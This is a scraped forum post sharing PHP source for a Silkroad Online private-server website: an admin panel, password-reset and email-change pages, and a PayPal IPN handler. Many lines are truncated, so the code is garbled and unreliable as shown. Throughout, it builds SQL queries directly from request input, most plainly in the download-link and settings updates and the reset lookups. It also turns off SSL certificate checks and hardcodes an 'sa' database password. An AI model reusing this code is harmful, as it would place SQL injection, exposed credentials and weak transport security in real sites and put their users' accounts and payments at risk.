$userRank != "admin" )
"NOT ADMIN" ;
$_GET [ 'act' ])
'news' ):
$_GET [ 'subact' ]))
?>
<!--=== Breadcrumbs ===-->
<?php }
$_GET [ 'subact' ])
'add' ):
$_POST [ 'submit' ]) && !isset( $_POST [ 'title' ]))
?>
<!--=== Breadcrumbs ===-->
<?php echo misc :: back (); ?>
<input type="submit" name="submit" class="btn-u pull-right" value="Add">
<?php }
$szTitle = security :: toHTML ( $_POST [ 'title' ]);
//$szText = misc::applyAttributesToText($_POST['textBox']);
$szText = stripslashes ( security :: toHTML ( $_POST [ 'textBox' ]));
core :: $sql -> exec ( "insert into srcms_news(title,content,author,time) values(' $szTitle ',' $szText ',' $_SESSION [ username ] ','" . misc :: getDateTime (). "')" ); ?>
<!--=== Breadcrumbs ===-->
<?php
echo "News article added.<br/>" ;
misc :: redirect ( '?pg=admin&act=news' , 1 );
?>
</div><!--/row-fluid-->
<?php }
'del' ):
$_GET [ 'id' ]))
$nID = (int) $_GET [ 'id' ];
core :: $sql -> numRows ( "select * from srcms_news where id=' $nID '" ) > 0 )
core :: $sql -> exec ( "delete from srcms_news where id=' $nID '" );
core :: $sql -> exec ( "delete from srcms_newscomments where newsID=' $nID '" ); ?>
<!--=== Breadcrumbs ===-->
<?php
echo "News article deleted.<br/>" ;
misc :: redirect ( '?pg=admin&act=news&subact=del' , 3 );
?>
</div><!--/row-fluid-->
<?php break;
?>
<!--=== Breadcrumbs ===-->
<?php
echo " You can't delete article that does not exist.<br/>" ;
misc :: redirect ( '?pg=admin&act=news&subact=del' , 3 );
?>
</div><!--/row-fluid-->
<?php }
$_POST [ 'submit' ]) && !isset( $_GET [ 'id' ]))
?>
<!--=== Breadcrumbs ===-->
<?php $hNewsArticles = core :: $sql -> exec ( "select * from srcms_news" );
core :: $sql -> numRows ( "select * from srcms_news" ) == 0 )
?>
No news added yet<br/>
<?php }
$row = mssql_fetch_array ( $hNewsArticles ))
?>
<tr>
<?php echo $row [ id ]; ?> </td>
<?php echo $row [ title ]; ?> </td>
<?php echo $row [ author ]; ?> </td>
<?php echo $row [ time ]; ?> </td>
<?php echo misc :: back (); ?> <a href='?pg=admin&act=news&subact=del&id=<?php echo $row [ id ]; ?> ' class="btn-u">Delete</a>
<?php
}
?>
</table>
<?php }
'edit' ):
$_POST [ 'submit' ]) && !isset( $_GET [ 'id' ]))
?>
<!--=== Breadcrumbs ===-->
<?php $hNewsArticles = core :: $sql -> exec ( "select * from srcms_news" );
mssql_num_rows ( $hNewsArticles ) == 0 )
?>
No news added yet<br/>
<?php }
$row = mssql_fetch_array ( $hNewsArticles ))
?>
<tr>
<?php echo $row [ id ]; ?> </td>
<?php echo $row [ title ]; ?> </td>
<?php echo $row [ author ]; ?> </td>
<?php echo $row [ time ]; ?> </td>
<?php echo misc :: back (); ?> <a href='?pg=admin&act=news&subact=edit&id=<?php echo $row [ id ]; ?> ' class="btn-u">Edit</a></td>
<?php
}
?>
</table>
<?php }
$nID = (int) $_GET [ 'id' ];
core :: $sql -> numRows ( "select * from srcms_news where id=' $nID '" ) == 0 )
?>
<!--=== Breadcrumbs ===-->
<?php
echo " You can't edit article that does not exist.<br/>" ;
misc :: redirect ( '?pg=admin&act=news&subact=del' , 3 );
?>
</div><!--/row-fluid-->
<?php }
$_POST [ 'submit' ] != 'Save' )
$hArticleData = core :: $sql -> exec ( "select * from srcms_news where id=' $nID '" );
$hArticleData = mssql_fetch_array ( $hArticleData ); ?>
<!--=== Breadcrumbs ===-->
<?php echo $hArticleData [ title ]; ?> )</h1>
<?php echo $hArticleData [ title ]; ?> )</h3>
<?php echo $hArticleData [ title ]; ?> "/>
<?php echo $hArticleData [ content ]; ?> </textarea>
<?php echo misc :: back (); ?>
<input type="submit" name="submit" class="btn-u pull-right" value="Save">
<?php }
$szTitle = security :: toHTML ( $_POST [ 'title' ]);
$szText = stripslashes ( security :: toHTML ( $_POST [ 'textBox' ]));
core :: $sql -> exec ( "update srcms_news set title=' $szTitle ',content=' $szText ' where id=' $nID '" ); ?>
<!--=== Breadcrumbs ===-->
<?php
echo "News article edited.<br/>" ;
misc :: redirect ( '?pg=admin&act=news&subact=edit' , 3 );
?>
</div><!--/row-fluid-->
<?php }
"Unknown subaction" ;
#echo "<br/>";misc::back();
}
'dl' ):
$_GET [ 'subact' ]))
?>
<!--=== Breadcrumbs ===-->
<?php }
$_GET [ 'subact' ])
'add' ):
$_POST [ 'submit' ]) && !isset( $_POST [ 'link' ]))
?>
<!--=== Breadcrumbs ===-->
<?php echo misc :: back (); ?>
<input type="submit" name="submit" class="btn-u pull-right" value="Add">
<?php }
$szName = security :: toHTML ( $_POST [ 'name' ]);
$szDesc = security :: toHTML ( $_POST [ 'description' ]);
security :: isValidUrl ( $_POST [ 'link' ]))
?>
<!--=== Breadcrumbs ===-->
<?php echo misc :: back (); ?>
</div><!--/row-fluid-->
<?php break;
core :: $sql -> exec ( "insert into srcms_downloads(name,link,description) values(' $szName ',' $_POST [ link ] ',' $szDesc ')" ); ?>
<!--=== Breadcrumbs ===-->
<?php echo misc :: redirect ( '?pg=admin&act=dl' , 3 ); ?>
</div><!--/row-fluid-->
<?php }
'del' ):
$_POST [ 'submit' ]) && !isset( $_GET [ 'id' ]))
?>
<!--=== Breadcrumbs ===-->
<?php $hLinkList = core :: $sql -> exec ( "select * from srcms_downloads" );
mssql_num_rows ( $hLinkList ) > 0 )
$row = mssql_fetch_array ( $hLinkList ))
?>
<tr>
<?php echo $row [ id ]; ?> </td>
<?php echo $row [ name ]; ?> </td>
<?php echo $row [ link ]; ?> </td>
<?php echo $row [ description ]; ?> </td>
<?php echo misc :: back (); ?> <a href='?pg=admin&act=dl&subact=del&id=<?php echo $row [ id ]; ?> ' class="btn-u pull-right">Delete</a></td>
<?php }
"No links added yet.<br/>" ;
?>
</table>
<?php }
$nID = (int) $_GET [ 'id' ];
core :: $sql -> numRows ( "select * from srcms_downloads where id=' $nID '" ) > 0 )
core :: $sql -> exec ( "delete from srcms_downloads where id=' $nID '" ); ?>
<!--=== Breadcrumbs ===-->
<?php echo misc :: redirect ( '?pg=admin&act=dl' , 3 ); ?>
</div><!--/row-fluid-->
<?php }
?>
<!--=== Breadcrumbs ===-->
<?php echo misc :: redirect ( '?pg=admin&act=dl' , 3 ); ?>
</div><!--/row-fluid-->
<?php }
'edit' ):
$_POST [ 'submit' ]) && !isset( $_GET [ 'id' ]))
?>
<!--=== Breadcrumbs ===-->
<?php $hLinks = core :: $sql -> exec ( "select * from srcms_downloads" );
mssql_num_rows ( $hLinks ) > 0 )
$row = mssql_fetch_array ( $hLinks ))
?>
<tr>
<?php echo $row [ id ]; ?> </td>
<?php echo $row [ name ]; ?> </td>
<?php echo $row [ link ]; ?> </td>
<?php echo $row [ description ]; ?> </td>
<?php echo misc :: back (); ?> <a href='?pg=admin&act=dl&subact=edit&id=<?php echo $row [ id ]; ?> ' class="btn-u pull-right">Edit</td>
<?php }
"No links added yet.<br/>" ;
?>
</table>
<?php }
$nID = (int) $_GET [ 'id' ];
$hLinkData = core :: $sql -> exec ( "select * from srcms_downloads where id=' $nID '" );
mssql_num_rows ( $hLinkData ) > 0 )
$_POST [ 'link' ]))
$hArray = mssql_fetch_array ( $hLinkData ); ?>
<!--=== Breadcrumbs ===-->
<?php echo $hArray [ name ]; ?> )</h3>
<?php echo $hArray [ name ]; ?> "/>
<?php echo $hArray [ link ]; ?> "/>
<?php echo $hArray [ description ]; ?> "/>
<?php echo misc :: back (); ?>
<input type="submit" name="submit" class="btn-u pull-right" value="Save">
<?php }
security :: isValidUrl ( $_POST [ 'link' ]))
?>
<!--=== Breadcrumbs ===-->
<?php echo misc :: back (); ?>
</div><!--/row-fluid-->
<?php }
$szName = misc :: toHTML ( $_POST [ 'name' ]);
$szDesc = misc :: toHTML ( $_POST [ 'description' ]);
core :: $sql -> exec ( "update srcms_downloads set name=' $szName ',description=' $szDesc ',link=' $_POST [ link ] ' where id=' $nID '" ); ?>
<!--=== Breadcrumbs ===-->
<?php echo isc :: redirect ( '?pg=admin&act=dl' , 3 ); ?>
</div><!--/row-fluid-->
<?php }
?>
<!--=== Breadcrumbs ===-->
<?php echo misc :: back (); ?>
</div><!--/row-fluid-->
<?php break;
"Unknown subaction" ; break;
#echo "<br/>";
}
'settings' ):
$_POST [ 'submit' ] != 'Save' )
?>
<!--=== Breadcrumbs ===-->
<?php $hSettings = core :: $sql -> exec ( "select * from srcms_settings" );
$row = mssql_fetch_array ( $hSettings ))
?>
<tr>
<?php echo $row [ valueName ]; ?> </td>
<?php echo $row [ valueName ]; ?> ' value='<?php echo $row [ value ]; ?> '>
<?php } ?>
<tr>
<?php echo misc :: back (); ?>
<input type="submit" name="submit" class="btn-u pull-right" value="Save">
<?php }
$_POST as $nElement => $nElementValue )
core :: $sql -> exec ( "update srcms_settings set value=' $nElementValue ' where valueName=' $nElement '" );
?>
<?php echo misc :: redirect ( '?pg=admin&act=settings' , 3 ); ?>
</div><!--/row-fluid-->
<?php }
'epin' ):
$_GET [ 'subact' ]))
?>
<!--=== Breadcrumbs ===-->
<?php }
$_GET [ 'subact' ])
'gen' ):
$_POST [ 'submit' ]))
?>
<!--=== Breadcrumbs ===-->
<?php echo misc :: back (); ?>
<input type="submit" name="submit" class="btn-u pull-right" value='Generate new epin'>
<?php }
$nRandCode = rand ( 1000000000 , 2000000000 );
core :: $sql -> numRows ( "select * from srcms_epin where code=' $nRandCode '" ) == 0 )
$nSilk = (int) $_POST [ 'silkAmount' ];
core :: $sql -> exec ( "insert into srcms_epin(code,silkAmount) values(' $nRandCode ',' $nSilk ')" ); ?>
<!--=== Breadcrumbs ===-->
<?php echo $nRandCode ; ?> </b>
<?php }
?>
<!--=== Breadcrumbs ===-->
<?php echo misc :: back (); ?> </b>
<?php break;
'lookup' ):
core :: $sql -> numRows ( "select * from srcms_epin" ) > 0 )
?>
<!--=== Breadcrumbs ===-->
<?php $hCodesData = core :: $sql -> exec ( "select * from srcms_epin" );
$row = mssql_fetch_array ( $hCodesData ))
?>
<tr>
<?php echo $row [ code ]; ?> </b></td>
<?php echo $row [ silkAmount ]; ?> </b></td>
<?php } ?>
</table>
<?php }
?>
<!--=== Breadcrumbs ===-->
<?php }
"Unknown subaction<br/>" ;break;
#echo "<br/>";
}
"Unknown action" ;
?>
cem
كود PHP:
<?php
if(isset( $_GET [ 'uid' ]))
security :: isSecureString ( $_GET [ 'uid' ], 3 ))
$uid = $_GET [ 'uid' ];
core :: $sql -> numRows ( "select * from PW_Restore where RandomPASS = ' $uid '" ) == 0 )
'this UID is incorrect or have been changed , request a new UID.' ;
$_POST [ 'submit' ]))
//process data
if(! security :: isSecureString ( $_POST [ 'password_new' ], 3 )) $errors [] = "Password [new] contains forbidden symbols" ;
strlen ( $_POST [ 'password_new' ]) > 32 ) $errors [] = "Password [new] too long" ;
strlen ( $_POST [ 'password_new' ]) < 6 ) $errors [] = "Passwrod [new] too short" ;
$_POST [ 'password_new' ] !== $_POST [ 'password_new_confirm' ]) $errors [] = "New Passwords does not match!." ;
count ( $errors ) > 0 )
$errors as $nElement )
$nElement . ".<br/>" ;
misc :: back ();
//verify
if( user :: RestorePass ( $_GET [ 'uid' ], $_POST [ 'password_new' ]))
"Password changed successfully. <br/>" ;
misc :: redirect ( '?pg=news' , 1 );
"Invalid old password specified.<br/>" ;
misc :: back ();
core :: $ucp -> ForgotpwForm ();
'Entry is invalid.' ;
?>
emailreplace
كود PHP:
<?php
if (isset( $_POST [ 'replacemail1' ])) {
security :: isSecureString ( $_SESSION [ 'username' ], 3 )) $errors [] = "Username field contains forbidden symbols" ;
security :: isSecureString ( $_POST [ 'email' ], 2 )) $errors [] = "Email field contains forbidden symbols" ;
security :: isCorrectEmail ( $_POST [ 'email' ])) $errors [] = "Invalid email address" ;
count ( $errors ) > 0 )
$i = 0 ; $i < count ( $errors ); $i ++)
$errors [ $i ]. ".<br/>" ;
core :: $sql -> changeDB ( 'acc' );
$user = $_SESSION [ 'username' ];
$email = $_POST [ 'email' ];
$_SESSION [ 'username' ]) || empty( $_POST [ 'email' ])) {
'Error :' ;
'<br />' ;
"You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>" ;
$_POST [ 'replacemail1' ]);
$check = core :: $sql -> numRows ( "select Name from TB_User where StrUserID = ' $user ' and Email = ' $email '" );
$check !== 1 ) {
'Error :' ;
'<br />' ;
"User with following email/password doesn't exist! <a href = '?pg=forgot'>go back and try again!</a>" ;
$_POST [ 'replacemail1' ]);
$title = "Your Email Change Link!" ;
$getrandom = misc :: genRandomString ();
$datetime = gmDate ( 'Y-m-d H:i:s' );
$content = "HolySro Email Change Link : http://holysro.com/?pg=cem&uid= $getrandom \n Get inside to change your Email \n if you didnt request it , please ignore this mail.!" ;
mail ( $email , "[HolySro Email Change] " . $title , $content . "\nEmail sent from: www.holysro.com" );
core :: $sql -> changeDB ( 'acc' );
$ZsCheck = core :: $sql -> numRows ( "select UserID from Email_Change where UserID = ' $user '" );
$ZsCheck == 1 ) {
core :: $sql -> exec ( "update Email_Change set RandomPASS =' $getrandom ' ,createtime = ' $datetime ',ipaddr = ' $_SERVER [ REMOTE_ADDR ] ' where UserID = ' $user '" );
core :: $sql -> exec ( "insert into Email_Change(UserID,RandomPASS,createtime,ipaddr) values(' $user ',' $getrandom ',' $datetime ',' $_SERVER [ REMOTE_ADDR ] ')" );
"instructions to Email Change sent to your mailbox [ $email ] - please check your mailbox! <br /> In case you haven't received the email from us - check your spam folder! <br /><a href='?pg=index'>Return to main page</a>" ;
$_POST [ 'replacemail1' ]);
misc :: redirect ( "?pg=news" , 2 );
?>
<!--=== Breadcrumbs ===-->
[email protected] " />
<?php } ?>
forgotpw
كود PHP:
<?php
global $core ;
$_POST [ 'forgotpassword' ])) {
security :: isSecureString ( $_POST [ 'username' ], 3 )) $errors [] = "Username field contains forbidden symbols" ;
security :: isSecureString ( $_POST [ 'email' ], 2 )) $errors [] = "Email field contains forbidden symbols" ;
security :: isCorrectEmail ( $_POST [ 'email' ])) $errors [] = "Invalid email address" ;
count ( $errors ) > 0 )
$i = 0 ; $i < count ( $errors ); $i ++)
$errors [ $i ]. ".<br/>" ;
core :: $sql -> changeDB ( 'acc' );
$user = $_POST [ 'username' ];
$email = $_POST [ 'email' ];
$_POST [ 'username' ]) || empty( $_POST [ 'email' ])) {
'Error :' ;
'<br />' ;
"You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>" ;
$_POST [ 'forgotpassword' ]);
$check = core :: $sql -> numRows ( "select Name from TB_User where StrUserID = ' $user ' and Email = ' $email '" );
$check !== 1 ) {
'Error :' ;
'<br />' ;
"User with following email/password doesn't exist! <a href = '?pg=forgot'>go back and try again!</a>" ;
$_POST [ 'forgotpassword' ]);
$passw = core :: $sql -> exec ( "select Name from TB_User where StrUserID = ' $user ' and Email = ' $email '" );
$row = mssql_fetch_array ( $passw )) {
$pass = $row [ 'Name' ];
$title = "Your password!" ;
$getrandom = misc :: genRandomString ();
$datetime = gmDate ( 'Y-m-d H:i:s' );
$getsiteurl = $_SERVER [ 'SERVER_NAME' ];
$servername = $core -> aConfig [ 'serverName' ];
$content = " $servername Password Reset Link : http:// $getsiteurl /?pg=cpw&uid= $getrandom \n Get inside to change your password \n if you didnt request it , please ignore this mail.!" ;
mail ( $email , "[ $servername Password Recovery] " . $title , $content . "\nEmail sent from: $getsiteurl " );
core :: $sql -> changeDB ( 'acc' );
$ZsCheck = core :: $sql -> numRows ( "select UserID from PW_Restore where UserID = ' $user '" );
$ZsCheck == 1 ) {
core :: $sql -> exec ( "update PW_Restore set RandomPASS =' $getrandom ' ,createtime = ' $datetime ',ipaddr = ' $_SERVER [ REMOTE_ADDR ] ' where UserID = ' $user '" );
core :: $sql -> exec ( "insert into PW_Restore(UserID,RandomPASS,createtime,ipaddr) values(' $user ',' $getrandom ',' $datetime ',' $_SERVER [ REMOTE_ADDR ] ')" );
?>
<!--=== Breadcrumbs ===-->
<?php echo $email ; ?> </code> ] - please check your mailbox! <br /> In case you haven't received the email from us - check your spam folder! <br /><a href='?pg=index'>Return to main page</a>
<?php unset( $_POST [ 'forgotpassword' ]); ?>
<?php }
?>
[email protected] ">
<?php }
?>
forums
كود PHP:
<?php
global $core ;
"Redirecting..." ;
misc :: redirect ( $core -> aConfig [ 'forumLink' ], 2 );
?>
ipn
كود PHP:
<?php
= mssql_connect ( 'WIN-58LMRAF4MSQ\SQLEXPRESS' , 'sa' , 'hkjhldkdhq@012012' ) // Edit to your Settings (SQL,ID,PW) .
or die( 'Could not connect to the server!' );
// Select a database:
mssql_select_db ( 'SRO_VT_ACCOUNT_Tito' ) // Edit to you Account Database!! .
or die( 'Could not select a database.' );
$ppEmail = '[email protected] ' ; // Edit This Email to your Paypal!!! .
$personalEmail = '[email protected] ' ; // Edit This Email to your Paypal!!! .
$amountUsd = array( '5.00' , '10.00' , '15.00' , '25.00' , '50.00' ); // Edit The Price Here ! (must be double (XX.XX)!) .
$usdToSilks = array( 5 => 300 , 10 => 700 , 15 => 1100 , 25 => 2000 , 50 => 4500 ); // Edit Silks From Price 10=>500 [10$ = 500 Silk] .
ini_set ( 'log_errors' , true );
ini_set ( 'error_log' , dirname ( __FILE__ ). '/ipn_errors.log' );
// intantiate the IPN listener
include( 'ipnlistener.php' );
$listener = new IpnListener ();
// tell the IPN listener to use the PayPal test sandbox
$listener -> use_sandbox = false ;
// try to process the IPN POST
try {
$listener -> requirePostMethod ();
$verified = $listener -> processIpn ();
Exception $e ) {
error_log ( $e -> getMessage ());
0 );
$verified ) {
$errmsg = '' ; // stores errors from fraud checks
if ( $_POST [ 'payment_status' ] != 'Completed' ) {
// simply ignore any IPN that is not completed
exit( 0 );
// Make sure seller email matches your primary account email.
if ( $_POST [ 'receiver_email' ] != $ppEmail ) {
$errmsg .= "'receiver_email' does not match: " ;
$errmsg .= $_POST [ 'receiver_email' ]. "\n" ;
//checks currency
if ( $_POST [ 'mc_currency' ] != 'USD' ) {
$errmsg .= "'mc_currency' does not match: " ;
$errmsg .= $_POST [ 'mc_currency' ]. "\n" ;
// Make sure the amount(s) paid match
if ( $_POST [ 'mc_currency' ] = 'USD' ) {
in_array ( $_POST [ 'mc_gross' ], $amountUsd )) {
$errmsg .= "'mc_gross' does not match: " ;
$errmsg .= $_POST [ 'mc_gross' ]. "\n" ;
/* if ($_POST['mc_currency'] = 'EUR') {
$txn_id = ms_escape_string ( $_POST [ 'txn_id' ]);
$sql = "SELECT * FROM paypal WHERE txn_id = ' $txn_id '" ;
$r = mssql_query ( $sql );
$r ) {
error_log ( mysql_error ());
0 );
// $exists = mssql_query($r, 0);
$exists = mssql_num_rows ( $r );
mssql_free_result ( $r );
$exists <> 0 ) {
$errmsg .= "'txn_id' has already been processed: " . $_POST [ 'txn_id' ]. "\n" ;
$errmsg )) {
// manually investigate errors from the fraud checking
$body = "IPN failed fraud checks: \n $errmsg \n\n" ;
$body .= $listener -> getTextReport ();
mail ( $personalEmail , 'Paypal Buyer Notice!' , $body );
error_log ( $body ); exit( 0 );
$payer_email = ms_escape_string ( $_POST [ 'payer_email' ]);
$mc_gross = ms_escape_string ( $_POST [ 'mc_gross' ]);
$username = ms_escape_string ( $_POST [ 'custom' ]);
$timenow = date ( "y-m-d H:i:s" , time ());
$sql = "INSERT INTO paypal (txn_id,payer_email,mc_gross,username,date)VALUES
$txn_id ', ' $payer_email ', $mc_gross , ' $username ', ' $timenow ')" ; // Add A logs of buys for server owner [Naty48] .
if (! mssql_query ( $sql )) {
error_log ( mysql_error ());
0 );
//silk update [NATY48]
$silkAmount = $usdToSilks [(int) $mc_gross ];
mssql_query ( "exec CGI.CGI_WebPurchaseSilk 0,' $username ',0, $silkAmount ,0" ); // will execute automated in game update of silks.
}
// manually investigate the invalid IPN .
}
ms_escape_string ( $data ) {
$data ) or empty( $data ) ) return '' ;
is_numeric ( $data ) ) return $data ;
$non_displayables = array(
'/%0[0-8bcef]/' , // url encoded 00-08, 11, 12, 14, 15
'/%1[0-9a-f]/' , // url encoded 16-31
'/[\x00-\x08]/' , // 00-08
'/\x0b/' , // 11
'/\x0c/' , // 12
'/[\x0e-\x1f]/' // 14-31
);
$non_displayables as $regex )
$data = preg_replace ( $regex , '' , $data );
$data = str_replace ( "'" , "''" , $data );
$data ;
?>
ipnlistener
كود PHP:
<?php
class IpnListener {
$use_curl = true ;
$force_ssl_v3 = false ;
/**
public $use_ssl = true ;
/**
public $use_sandbox = false ;
/**
public $timeout = 30 ;
$post_data = array();
$post_uri = '' ;
$response_status = '' ;
$response = '' ;
PAYPAL_HOST = 'www.paypal.com' ;
SANDBOX_HOST = 'www.sandbox.paypal.com' ;
/**
protected function curlPost ( $encoded_data ) {
$this -> use_ssl ) {
$uri = 'https://' . $this -> getPaypalHost (). '/cgi-bin/webscr' ;
$this -> post_uri = $uri ;
$uri = 'http://' . $this -> getPaypalHost (). '/cgi-bin/webscr' ;
$this -> post_uri = $uri ;
$ch = curl_init ();
curl_setopt ( $ch , CURLOPT_URL , $uri );
curl_setopt ( $ch , CURLOPT_POST , true );
curl_setopt ( $ch , CURLOPT_POSTFIELDS , $encoded_data );
curl_setopt ( $ch , CURLOPT_FOLLOWLOCATION , true );
curl_setopt ( $ch , CURLOPT_TIMEOUT , $this -> timeout );
curl_setopt ( $ch , CURLOPT_RETURNTRANSFER , true );
curl_setopt ( $ch , CURLOPT_HEADER , true );
$this -> force_ssl_v3 ) {
curl_setopt ( $ch , CURLOPT_SSLVERSION , 3 );
curl_setopt ( $ch , CURLOPT_SSL_VERIFYPEER , false );
$this -> response = curl_exec ( $ch );
$this -> response_status = strval ( curl_getinfo ( $ch , CURLINFO_HTTP_CODE ));
$this -> response === false || $this -> response_status == '0' ) {
$errno = curl_errno ( $ch );
$errstr = curl_error ( $ch );
Exception ( "cURL error: [ $errno ] $errstr " );
/**
protected function fsockPost ( $encoded_data ) {
$this -> use_ssl ) {
$uri = 'ssl://' . $this -> getPaypalHost ();
$port = '443' ;
$this -> post_uri = $uri . '/cgi-bin/webscr' ;
$uri = $this -> getPaypalHost (); // no "http://" in call to fsockopen()
$port = '80' ;
$this -> post_uri = 'http://' . $uri . '/cgi-bin/webscr' ;
$fp = fsockopen ( $uri , $port , $errno , $errstr , $this -> timeout );
$fp ) {
// fsockopen error
throw new Exception ( "fsockopen error: [ $errno ] $errstr " );
$header .= "POST /cgi-bin/webscr HTTP/1.0\r\n" ;
$header .= "Content-Type: application/x-www-form-urlencoded\r\n" ;
$header .= "Content-Length: " . strlen ( $encoded_data ). "\r\n" ;
$header .= "Connection: Close\r\n\r\n" ;
fputs ( $fp , $header . $encoded_data . "\r\n\r\n" );
feof ( $fp )) {
$this -> response )) {
// extract HTTP status from first line
$this -> response .= $status = fgets ( $fp , 1024 );
$this -> response_status = trim ( substr ( $status , 9 , 4 ));
$this -> response .= fgets ( $fp , 1024 );
fclose ( $fp );
getPaypalHost () {
$this -> use_sandbox ) return IpnListener :: SANDBOX_HOST ;
IpnListener :: PAYPAL_HOST ;
/**
public function getPostUri () {
$this -> post_uri ;
/**
public function getResponse () {
$this -> response ;
/**
public function getResponseStatus () {
$this -> response_status ;
/**
public function getTextReport () {
$r = '' ;
// date and POST url
for ( $i = 0 ; $i < 80 ; $i ++) { $r .= '-' ; }
$r .= "\n[" . date ( 'm/d/Y g:i A' ). '] - ' . $this -> getPostUri ();
$this -> use_curl ) $r .= " (curl)\n" ;
$r .= " (fsockopen)\n" ;
// HTTP Response
for ( $i = 0 ; $i < 80 ; $i ++) { $r .= '-' ; }
$r .= "\n { $this -> getResponse ()} \n" ;
// POST vars
for ( $i = 0 ; $i < 80 ; $i ++) { $r .= '-' ; }
$r .= "\n" ;
$this -> post_data as $key => $value ) {
$r .= str_pad ( $key , 25 ). " $value \n" ;
$r .= "\n\n" ;
$r ;
/**
public function processIpn ( $post_data = null ) {
$encoded_data = 'cmd=_notify-validate' ;
$post_data === null ) {
// use raw POST data
if (!empty( $_POST )) {
$this -> post_data = $_POST ;
$encoded_data .= '&' . file_get_contents ( 'php://input' );
Exception ( "No POST data found." );
// use provided data array
$this -> post_data = $post_data ;
$this -> post_data as $key => $value ) {
$encoded_data .= "& $key =" . urlencode ( $value );
$this -> use_curl ) $this -> curlPost ( $encoded_data );
$this -> fsockPost ( $encoded_data );
strpos ( $this -> response_status , '200' ) === false ) {
Exception ( "Invalid response status: " . $this -> response_status );
strpos ( $this -> response , "VERIFIED" ) !== false ) {
true ;
strpos ( $this -> response , "INVALID" ) !== false ) {
false ;
Exception ( "Unexpected response from PayPal." );
/**
public function requirePostMethod () {
// require POST requests
if ( $_SERVER [ 'REQUEST_METHOD' ] && $_SERVER [ 'REQUEST_METHOD' ] != 'POST' ) {
header ( 'Allow: POST' , true , 405 );
Exception ( "Invalid HTTP request method." );
?>
news
كود PHP:
<?php
global $core ;
$_GET [ 'del' ]))
$nCommentID = (int) $_GET [ 'del' ];
$isAdmin = core :: $sql -> getRow ( "select whois from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" );
core :: $sql -> numRows ( "select * from srcms_newscomments where id=' $nCommentID ' and author=' $_SESSION [ username ] '" ) > 0 || $isAdmin == "admin" )
core :: $sql -> exec ( "delete from srcms_newscomments where id=' $nCommentID '" );
misc :: redirect ( "?pg=news&comment= $_GET [ backid ] " , 0 );
"<br/><br/>You can't delete comment that does not belong to you." ;
$_GET [ 'comment' ]))
$hQuery = core :: $sql -> exec ( "select * from srcms_news order by id desc" );
?>
<?php
while( $row = mssql_fetch_array ( $hQuery ))
$nComments = core :: $sql -> numRows ( "select * from srcms_newscomments where newsID=' $row [ id ] '" );
$szAvatarUrl = user :: getUserAvatarUrl ( $row [ 'author' ]);
$dateee = gmDate ( 'Y-m-d H:i:s' );
$nComments = core :: $sql -> getRow ( "select count(*) from srcms_newscomments where newsID=' $row [ id ] '" );
$userRank = core :: $sql -> getRow ( "select whois from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $row [ 'author' ]). "'" );
$szUserRank = user :: getRankText ( $userRank );
$row [ 'content' ] = security :: fromHTML ( $row [ 'content' ]);
$row [ 'content' ] = misc :: applyAttributesToText ( $row [ 'content' ]);
$datetime = strtotime ( $row [ 'time' ]);
$mssqldate = date ( "d/m/y" , $datetime ); ?>
<?php if( strtotime ( $row [ 'time' ]) > strtotime ( 'last week' )) {
$_NEW = "" ;
$_NEW = "<code>New</code>" ;
?>
<div class="headline">
<?php echo $_NEW ; ?> <a href="#" onclick="return false" onmousedown="javascript<?php echo $row [ id ]; ?> ')">
<?php echo $row [ title ]; ?> <img src="assets/img/expand.png" alt="Toggle" title="Show content" style="position:relative;" />
<?php echo $mssqldate ; ?> )</font>
<?php echo $row [ id ]; ?> "><?php echo $row [ content ]; ?> </small>
<?php
} ?>
<?php } else {
$nID = (int) $_GET [ 'comment' ]; //cast to int .
if(!isset( $_GET [ 'page' ])) $_GET [ 'page' ] = 1 ;
core :: $sql -> numRows ( "select * from srcms_news where id=' $nID '" ) > 0 )
$getTitle = core :: $sql -> getRow ( "select title from srcms_news where id=' $nID '" ); ?>
<?php echo $getTitle ; ?> </h1>
<?php echo $getTitle ; ?> </li>
<?php $hGetComments = core :: $sql -> exec ( "select * from srcms_newscomments where newsID=' $nID '" );
$commentData = array();
$a = 0 ;
$row = mssql_fetch_array ( $hGetComments ))
$commentData [ $a ] = array( $row [ 'id' ], $row [ 'text' ], $row [ 'author' ], $row [ 'time' ]);
$a ++;
$_GET [ 'page' ] = (int) $_GET [ 'page' ];
$_GET [ 'page' ])) $_GET [ 'page' ] = 1 ;
$i = (( $_GET [ 'page' ] - 1 ) * 10 ); $i < (( $_GET [ 'page' ]) * 10 ); $i ++)
$nCommentID = $commentData [ $i ][ 0 ];
$szText = $commentData [ $i ][ 1 ];
$szText = misc :: applyAttributesToText ( $szText );
$szText = security :: fromHTML ( $szText );
$szAuthor = $commentData [ $i ][ 2 ];
$szTime = $commentData [ $i ][ 3 ];
strlen ( $szText ) == 0 ) break;
$szAvatar = user :: getUserAvatarUrl ( $szAuthor );
$commentPanelLinks = "" ;
$isCommentOwner = core :: $sql -> getRow ( "select whois from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $szAuthor ). "'" );
$isAdmin = core :: $sql -> getRow ( "select whois from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" );
$szAuthor == $_SESSION [ 'username' ] || $isAdmin == "admin" )
$commentPanelLinks = "<a href='?pg=news&del= $nCommentID &backid= $nID '><b>Delete</b></a>" ;
$szRank = user :: getRankText ( $isCommentOwner ); ?>
<div class="media">
<?php echo $szAvatar ; ?> " alt="<?php echo ucwords ( $szAuthor ); ?> "></a>
<?php echo $szAuthor ; ?> '> <?php echo $szRank ; echo " " ; echo ucwords ( $szAuthor ); ?> </a></h4><?php echo $szText ; ?> <div class="pull-right">Posted at <?php echo $szTime ; ?> - <?php echo $commentPanelLinks ; ?> </div></div>
<?php }
$_GET [ 'page' ] != 1 ) echo "<a href='?pg=news&comment= $nID &page=" .( $_GET [ 'page' ] - 1 ). "'><</a>" ;
$nPages = 0 ;
$a = 1 , $i = 0 ; $i < count ( $commentData ); $i ++)
$i % 10 == 0 )
"<a href='?pg=news&comment= $nID &page= $a '> $a </a> " ;
$a ++;
$nPages ++;
$_GET [ 'page' ] < $nPages ) echo "<a class='pageblue' href='?pg=news&comment= $nID &page=" .( $_GET [ 'page' ] + 1 ). "'>></a>" ;
$_SESSION [ 'username' ]))
$_POST [ 'submit' ]))
?>
<br /><form method="post">
<?php }
$cleanText = stripslashes ( security :: toHTML ( $_POST [ 'commentText' ]));
